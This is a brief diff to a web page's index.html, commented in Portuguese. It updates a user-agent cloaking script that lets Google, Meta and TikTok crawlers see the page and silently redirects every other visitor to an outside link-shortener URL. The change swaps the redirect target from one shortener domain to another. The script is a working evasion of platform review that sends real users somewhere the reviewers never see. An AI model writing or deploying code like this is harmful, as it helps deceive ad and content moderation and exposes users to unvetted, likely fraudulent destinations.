--- a/index.html
+++ b/index.html
@@ -7,7 +7,7 @@
         // Verifica se o agente do usuário corresponde a um bot.
         if (!userAgent.match(/Googlebot|MetaURI|TikTokBot/i)) {
             // Redireciona todos os visitantes, exceto os bots, para o site específico.
-            window.location.href = "https://minhabio.click/face";
+            window.location.href = "https://www.linker.fit/fcb";
         }
     </script>
     <meta charset="UTF-8">
